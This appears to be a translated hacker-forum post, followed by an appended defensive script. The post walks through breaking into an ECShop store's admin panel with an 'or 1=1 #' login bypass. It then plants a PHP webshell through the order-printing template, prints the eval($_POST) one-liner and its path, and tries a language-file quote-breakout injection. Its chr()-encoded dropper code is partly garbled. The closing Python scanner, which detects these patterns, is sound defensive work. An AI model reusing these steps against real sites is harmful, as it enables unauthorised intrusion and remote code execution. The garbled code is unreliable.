Title: Getting a shell on ECShop on a Linux system -- 2011-06-08 13:23
I recently got hold of a site and, not understanding how to get a shell on ECShop, took a lot of detours.
The server is nginx/0.8.54, magic_quotes_gpc escaping is on, and a lot of pages have been deleted.
The admin backend has an "or" vulnerability: the user is "or 1=1 #", with a password filled in.
I didn't know this at first; I don't know much.
The site's myship.php is not accessible. The templates under library item management can be edited, but the file path could not be found, and because the server uses nginx/0.8.54 the parsing vulnerability was patched.
Many of the usual shell methods cannot be used, such as backing up X.PHP.SPL, or using FCK to create an x.asp-type folder.
I was in the backend for a long time without clicking on Flash Player management; trying PHP there last, I had not expected that PHP files could be uploaded with no restrictions.
I went back to the Internet to look for other ways.
Backend - Order Management - Order Printing - choose Source Edit - Save
Return to the order list, pick any order and print it; it returns OK, and the one-line shell is generated successfully!
The following is the edited code:
--------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------
<?
$filen =CHR (+). chr (CHR). CHR (117). chr (108). chr (108). chr ("CHR"). Chr (104). CHR (112);
$filec =CHR. chr (104). CHR (101). Chr (118). Chr (108). Chr (36). Chr (the ".") (+) (+) (+)). Chr () Chr. chr (117). Chr (the "CHR") Chr. Chr (98). Chr (the ". Chr"). Chr (the "()). chr (" CHR ") (() The ( 62);
$a = chr(119);
$fp = @fopen($filen, $a);
$msg = @fwrite($fp, $filec);
if ($msg) Echo chr (. chr). chr (33);
@fclose($fp);
?>
--------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------
../null.php
<?php eval($_POST[usb]);?>
These are the path and the password.
I had another idea: when the single quote ' is not escaped, use Admin Center - Language Item Editing to edit the PHP page and close the single quotation mark.
Edit shopping_flow.php
Enter the language item keyword: Activity list
List of activities ';?><?php @eval($_POST[ok]);?><?' Ok
Save
Then visit
http://site/languages/zh_cn/shopping_flow.php
I tried it and it failed: because ' is escaped, the single quotation mark after the activity list cannot be closed.
If anyone has other methods, let's discuss them together.
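A defender-side check for the artifacts this post describes, added here as an example and not part of the original post: a heuristic scan of template and language files for an eval() of request data, a chr()-assembled string next to a file write, and a quoted value closed early before a new PHP tag. The rule names, the file extensions and the sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Heuristic rules for the patterns described in this post.
RULES = {
    # One-line shell: eval() fed directly from request data.
    "eval_of_request": re.compile(
        r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    # A string assembled from four or more chr() calls (avoids quote characters).
    "chr_chain": re.compile(
        r"(?:chr\s*\(\s*\d+\s*\)\s*\.\s*){3,}chr\s*\(", re.I),
    # A quoted value closed early, followed directly by a new PHP open tag.
    "string_breakout": re.compile(r"['\"]\s*;\s*\?>\s*<\?"),
}
WRITE_CALL = re.compile(r"\b(?:fopen|fwrite|fputs|file_put_contents)\s*\(", re.I)


def scan_text(text):
    """Return the sorted names of the rules that match one file's contents."""
    hits = {name for name, rx in RULES.items() if rx.search(text)}
    # A chr() chain beside a file-write call is the dropper shape shown above.
    if "chr_chain" in hits and WRITE_CALL.search(text):
        hits.add("chr_dropper")
    return sorted(hits)


# Assumption: .lbi and .dwt are the template extensions in use on the site.
def scan_tree(root, suffixes=(".php", ".html", ".htm", ".lbi", ".dwt")):
    """Scan files under root; return {relative path: [rule names]} for hits only."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_text(path.read_text(errors="replace"))
            if found:
                report[path.relative_to(root).as_posix()] = found
    return report


# Constructed samples, not taken from a real site; the chr() values spell "demo".
SAMPLES = {
    "clean_lang.php": "<?php $_LANG['activity_list'] = 'Activity list'; ?>",
    "lang_breakout.php": "<?php $_LANG['x'] = 'a';?><?php @eval($_POST[k]);?><?'';",
    "print_tpl.html": "<? $f = chr(100).chr(101).chr(109).chr(111); $p = @fopen($f, 'w'); ?>",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_text(body))
```

These rules are heuristics: they will miss other encodings and can flag legitimate files, so compare hits against a known-good copy of the release.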